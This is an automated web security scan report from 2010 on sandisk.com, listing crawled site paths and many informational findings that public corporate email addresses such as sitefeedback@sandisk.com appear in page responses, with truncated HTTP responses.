/business-solutions/sd-worm/sd-worm-contact-us
/business-solutions/sd-worm/sd-worm-downloads
/business-solutions/sd-worm/solutions
/business-solutions/ssd
/business-solutions/ssd.aspx
/business-solutions/ssd/landing
/business-solutions/technology
/business-solutions/usb-flash-drives
/business-solutions/usb-flash-drives.aspx
/business-solutions/usb-flash-drives/
/business-solutions/usb-flash-drives/clear-case-ufd.aspx
/business-solutions/usb-flash-drives/core-module
/business-solutions/usb-flash-drives/core-module.aspx
/consumer-products
/consumer-products/camcorder
/consumer-products/camera
/consumer-products/computing
/consumer-products/computing/
/consumer-products/computing/ssd-landing
/consumer-products/dslr
/consumer-products/gaming
/consumer-products/mobile-memory
/consumer-products/music-player
/css/MediaPlayer_img/
/flash/
/global-sites
/homepage
/media/100759/
/media/100764/
/media/100769/
/media/100774/
/media/27670/
/media/27675/
/media/27685/
/media/27690/
/media/27695/
/media/407994/
/media/745047/
/misc/404error
/products/camcorder/sandisk-extreme-hd-video-sdhc-cards
/products/camcorder/sandisk-video-hd-sdhc
/products/computing-products/sandisk-cruzer-blade-usb-flash-drive
/products/computing-products/sandisk-solid-state-drive
/products/computing-products/sandisk-ultra-backup-usb-flash-drive
/products/dslr/
/products/dslr/sandisk-extreme-compactflash-card
/products/dslr/sandisk-extreme-iv-compactflash
/products/dslr/sandisk-extreme-pro-compactflash-card
/products/dslr/sandisk-extreme-pro-compactflash-card.aspx
/products/dslr/sandisk-extreme-sdhc-cards-
/products/dslr/sandisk-ultra-compact-flash
/products/dslr/sandisk-ultra-ii-compactflash
/products/dslr/sandisk-ultra-sdhc
/products/dslr/sandisk-ultra-sdxc-cards
/products/gaming-cards/sandisk-gaming-compatibility-pack
/products/gaming-cards/sandisk-memory-stick-micro-m2
/products/gaming-cards/sandisk-xbox-360-usb-flash-drive
/products/imaging/sandisk-extreme-sdhc-cards-
/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo
/products/mobile-memory-products/sandisk-memory-stick-micro-m2
/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx
/products/mobile-memory-products/sandisk-microsdhc
/products/mobile-memory-products/sandisk-microsdhc.aspx
/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc
/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx
/products/netbook-cards/sandisk-netbook-sdhc-memory-card
/products/readers-accessories
/products/readers-accessories/large-memory-card-case
/products/readers-accessories/micromate-sdhc
/products/readers-accessories/sandisk-extreme-20-usb-readers
/products/readers-accessories/sandisk-extreme-firewire-reader
/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter
/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader
/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader
/products/readers-accessories/sandisk..-mobilemate...-duo
/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player
/products/slotradioproducts/sansaplayers-cards/card-vh1-classic
/sandisk-rss
/sandisk-rss.aspx
/sandisk-support/contact-us
/sandisk-support/driver-download-wizard
/sandisk-support/where-to-buy
/sitemap

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

3.1. http://www.sandisk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28444
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.2. http://www.sandisk.com/PlayListXML/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/PlayListXML/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.3. http://www.sandisk.com/SanDisk/US-eStore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/US-eStore

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.4. http://www.sandisk.com/SanDisk/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/facebook

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.5. http://www.sandisk.com/SanDisk/linkedin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/linkedin

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.6. http://www.sandisk.com/SanDisk/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/rss

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.7. http://www.sandisk.com/SanDisk/twitter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/twitter

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.8. http://www.sandisk.com/SanDisk/youtube previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/youtube

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.9. http://www.sandisk.com/about-sandisk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.10. http://www.sandisk.com/about-sandisk.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.11. http://www.sandisk.com/about-sandisk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.12. http://www.sandisk.com/about-sandisk/careers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.13. http://www.sandisk.com/about-sandisk/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.14. http://www.sandisk.com/about-sandisk/careers/benefits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/benefits

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.15. http://www.sandisk.com/about-sandisk/careers/career-opportunities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/career-opportunities

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.16. http://www.sandisk.com/about-sandisk/careers/employment-practices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/employment-practices

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.17. http://www.sandisk.com/about-sandisk/careers/for-new-college-grads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/careers/for-new-college-grads

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.18. http://www.sandisk.com/about-sandisk/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/contact-us

Issue detail

The following email addresses were disclosed in the response:

AmericasRetailSales@sandisk.com
IR@sandisk.com
OEMsales@sandisk.com
careers@sandisk.com
dl-OEMsaleseurope@sandisk.com
sales_emea@sandisk.com
sitefeedback@sandisk.com
support@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28653
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:IR@sandisk.com">IR@sandisk.com</a>
...[SNIP]...
<a
href="mailto:careers@sandisk.com">careers@sandisk.com</a>
...[SNIP]...
<a
href="mailto:AmericasRetailSales@sandisk.com">AmericasRetailSales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:support@sandisk.com">support@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com">OEMsales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com">OEMsales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:dl-OEMsaleseurope@sandisk.com">dl-OEMsaleseurope@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.19. http://www.sandisk.com/about-sandisk/corporate-social-responsibility previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.20. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.21. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.22. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.23. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-education previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/community-education

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.24. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program

Issue detail

The following email addresses were disclosed in the response:

communitysharing@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15495
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:communitysharing@sandisk.com">communitysharing@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.25. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.26. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.27. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.28. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.29. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.30. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.31. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.32. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.33. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.34. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.35. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.36. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/product-environmental-compliance

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.37. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.38. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.39. http://www.sandisk.com/about-sandisk/management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/management

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.40. http://www.sandisk.com/about-sandisk/management/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/management/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.41. http://www.sandisk.com/about-sandisk/management/timeline-of-innovation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/management/timeline-of-innovation

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.42. http://www.sandisk.com/about-sandisk/media-kit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.43. http://www.sandisk.com/about-sandisk/media-kit/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.44. http://www.sandisk.com/about-sandisk/media-kit/business-and-industry-association-links previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/business-and-industry-association-links

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.45. http://www.sandisk.com/about-sandisk/media-kit/businessoem-products-brochures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/businessoem-products-brochures

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28370
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.46. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/executive-officer-photos

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.47. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/executive-officer-photos.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.48. http://www.sandisk.com/about-sandisk/media-kit/miscellaneous previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/miscellaneous

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.49. http://www.sandisk.com/about-sandisk/media-kit/oem-product-photos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/oem-product-photos

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.50. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.51. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.52. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos/dslr/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23167
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.53. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17531
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

